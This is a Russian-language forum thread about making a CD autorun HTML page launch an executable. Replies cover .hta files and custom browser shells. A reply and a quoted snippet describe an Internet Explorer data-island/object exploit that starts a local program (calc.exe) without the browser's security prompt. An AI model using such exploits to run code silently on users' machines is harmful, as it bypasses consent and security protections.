как запустить экзачину из html?
html запускается не по http:// а прямо с винта.
нужно, чтобы определённую экзечину html запускал не как обычно "скачать на винт" а _именно_запускал_
причём файло находится не по абсолютному пути а по относительному (html грузится с компашки — бог его знает, как у кого диск назван)
Здравствуйте, Adward, Вы писали:
A>Ребята, выручайте кто знает.
A>как запустить экзачину из html? A>html запускается не по http:// а прямо с винта. A>нужно, чтобы определённую экзечину html запускал не как обычно "скачать на винт" а _именно_запускал_
A>причём файло находится не по абсолютному пути а по относительному (html грузится с компашки — бог его знает, как у кого диск назван)
A>нужно для авторана. A>
Возможность автозапуска exe должна быть прописана в настройках безопасности браузера. Если там написано — спрашивать перед запуском всегда, то никак ты его не запустишь с ходу.
В принципе, можешь попробовать создать в JavaScript'е COM объект шела и через него дать команду на запуск. Только это будет как-то не красиво.
Самый дельный совет — посмотри как делают именитые производители (например, запуск exe с установкой драйвера при просмотре HTML с CD-ROM часто встречается)
Здравствуйте, mikkri, Вы писали:
A>как запустить экзачину из html?
M>Возможность автозапуска exe должна быть прописана в настройках безопасности браузера. Если там написано — спрашивать перед запуском всегда, то никак ты его не запустишь с ходу.
Нууу, я не смогу рекомендовать всем, кто мой авторан проглядывает, рекомендовать переписывать себе настройки... бывают же и круглые умные ламеры, переломают себе всю винду, а потом на меня в суд подадут, не, это не дело...
M>В принципе, можешь попробовать создать в JavaScript'е COM объект шела и через него дать команду на запуск. Только это будет как-то не красиво.
Это не только некрасиво, тут самое печальное, что бровзер начнёт тотчас же материться, что какой то активикс пытается начать работу, что ему на стоит доверять... в этом случае потенциальный покупатель сделает из моей компашки замечательный летательный диск .
M>Самый дельный совет — посмотри как делают именитые производители (например, запуск exe с установкой драйвера при просмотре HTML с CD-ROM часто встречается)
я перерыл добрые 2 десятка презентационных компарей у себя, но ничего не нашёл, но блин, ж%пой чувствую, что где то такое встречал, да, было, вот только где и когда не помню... может быть посмотрим у тебя?
Буду признателен дико
Здравствуйте, Adward, Вы писали:
A>я перерыл добрые 2 десятка презентационных компарей у себя, но ничего не нашёл, но блин, ж%пой чувствую, что где то такое встречал, да, было, вот только где и когда не помню... может быть посмотрим у тебя? A>Буду признателен дико
Есть такие автораны, но обычно они делаются с использованием своей оболочки над браузером, которая HTML и открывает. Там понятно — запустить можно молча что угодно.
Еще можно попробовать стартовую страницу сделать фреймом и обозвать ее как .hta (соответственно и из autorun.inf вызывать именно .hta файл).
А уж в этом фрейме открывать все остальные HTML файлы.
Обычно с локального компа hta-приложения запускаются без лишних вопросов и позволяют запускать .exe, создавать COM-обьекты тоже без лишних матюков...
А вообще есть возможность запустить exe сразу при открытии html-фаила.
При этом он откладывается (в кодированным виде, насколько я помню base64)
в самом файле. Это одна из уязвимостей в IE, потому не советую применять
в практических целях.
Для проверки скопируйте этот файл на локальный диск и запустите.
Здравствуйте, DSD, Вы писали:
DSD>Есть такие автораны, но обычно они делаются с использованием своей оболочки над браузером, которая HTML и открывает. Там понятно — запустить можно молча что угодно.
Именно так мы и сделали. Открываем на авторан экзечину, в которой встроен майкросовт интернет эксплорер браузер (точно не помню как называется компонент), а там уже перехватываем любой клик на ссылку.
причём каждой ссылке на запуск мы просто прописали свой псевдопротокол (exe по нему и смотрим, если есть в начале ссылки эта комбинация — запускать файло с компашки, если нет — идти куда ссылка глядит.
DSD>Еще можно попробовать стартовую страницу сделать фреймом и обозвать ее как .hta (соответственно и из autorun.inf вызывать именно .hta файл). DSD>А уж в этом фрейме открывать все остальные HTML файлы.
Вот этого незнал, однако... поэкспериментрую, спасибо!
DSD>Обычно с локального компа hta-приложения запускаются без лишних вопросов и позволяют запускать .exe, создавать COM-обьекты тоже без лишних матюков...
а это не есть дыра случаем? скажем в 7 IE это не исправят?
имхо разве это не глюк — позволять запускать без спросу ЭктивИксы из html'я?
Я кстати говоря, чуть было уже не начал использовать эту дыру:
Здравствуйте, Adward, Вы писали:
DSD>Обычно с локального компа hta-приложения запускаются без лишних вопросов и позволяют запускать .exe, создавать COM-обьекты тоже без лишних матюков... A>а это не есть дыра случаем? скажем в 7 IE это не исправят? A>имхо разве это не глюк — позволять запускать без спросу ЭктивИксы из html'я?
Нет, это не есть дыра. Это есть хорошо задокументированная дыра
То есть это исправлять не будут по причине того, что так изначально и задумывалось.
HTA-приложение — это почти то же самое, что и WSH-приложение(Windows Scripting Host)
С локального компа его запускать вполне можно. Простые .exe программы ты ведь запускаешь?
A>Я кстати говоря, чуть было уже не начал использовать эту дыру: A>
A><span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
A><xml id="oExec">
A> <security>
A> <exploit>
A> <![CDATA[
A> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
A> codebase="с:/WINnt/system32/calc.exe"></object>
]]>
A> </exploit>
A> </security>
</xml>
A>
А это еще спорная дыра. Частично исправить ее по идее должны. Но при запуске с локального компа может и разрешат этому обьекту не материться о секюрити...
A>Я кстати говоря, чуть было уже не начал использовать эту дыру:
A>
A><span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
A><xml id="oExec">
A> <security>
A> <exploit>
A> <![CDATA[
A> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
A> codebase="с:/WINnt/system32/calc.exe"></object>
]]>>
A> </exploit>
A> </security>
</xml>>
A>
ЁЁЁ cool
Когда-нибудь и я буду много знать, но пока это не грозит...
ICQ #134433